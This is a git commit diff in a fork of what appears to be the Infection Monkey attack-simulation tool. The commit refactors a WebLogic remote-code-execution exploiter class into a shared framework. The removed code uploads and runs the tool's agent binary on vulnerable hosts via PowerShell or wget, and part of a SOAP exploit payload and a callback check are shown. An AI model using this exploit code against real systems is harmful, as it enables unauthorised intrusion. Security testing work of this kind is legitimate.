forked from p15670423/monkey
Refactored according to final web_rce framework changes
This commit is contained in:
parent
10528c313d
commit
8fd42abd5d
|
@ -50,38 +50,12 @@ class WebLogicExploiter(WebRCE):
|
|||
'win32': 'monkey-32.exe',
|
||||
'win64': 'monkey-64.exe'})
|
||||
|
||||
def exploit_host(self):
|
||||
# Get open ports
|
||||
ports = self.get_ports_w(self.HTTP, ["http"])
|
||||
if not ports:
|
||||
return False
|
||||
# Get urls to try to exploit
|
||||
urls = self.build_potential_urls(ports, URLS)
|
||||
|
||||
# Checking takes a lot of time, so we check until we get exploitable url and stop
|
||||
vulnerable_urls = []
|
||||
for url in urls:
|
||||
# Get full URL
|
||||
if self.test_exploit(url):
|
||||
vulnerable_urls.append(url)
|
||||
break
|
||||
self._exploit_info['vulnerable_urls'] = vulnerable_urls
|
||||
if not vulnerable_urls:
|
||||
return False
|
||||
|
||||
data = self.upload_monkey(vulnerable_urls[0], {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD})
|
||||
|
||||
# We can't use 'if not' because response may be ''
|
||||
if not data or data['response'] is False:
|
||||
return False
|
||||
|
||||
if self.change_permissions(vulnerable_urls[0], data['path']) is False:
|
||||
return False
|
||||
|
||||
if self.execute_remote_monkey(vulnerable_urls[0], data['path']) is False:
|
||||
return False
|
||||
|
||||
return True
|
||||
def get_exploit_config(self):
|
||||
exploit_config = super(WebLogicExploiter, self).get_exploit_config()
|
||||
exploit_config['blind_exploit'] = True
|
||||
exploit_config['stop_checking_urls'] = True
|
||||
exploit_config['url_extensions'] = URLS
|
||||
return exploit_config
|
||||
|
||||
def exploit(self, url, command):
|
||||
empty_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
|
||||
|
@ -158,7 +132,7 @@ class WebLogicExploiter(WebRCE):
|
|||
self._stopped = True
|
||||
return
|
||||
|
||||
def test_exploit(self, url):
|
||||
def check_if_exploitable(self, url):
|
||||
local_port = get_free_tcp_port()
|
||||
local_ip = get_interface_to_target(self.host.ip_addr)
|
||||
httpd = WebLogicExploiter.HTTPServer(local_ip, local_port)
|
||||
|
|
Loading…
Reference in New Issue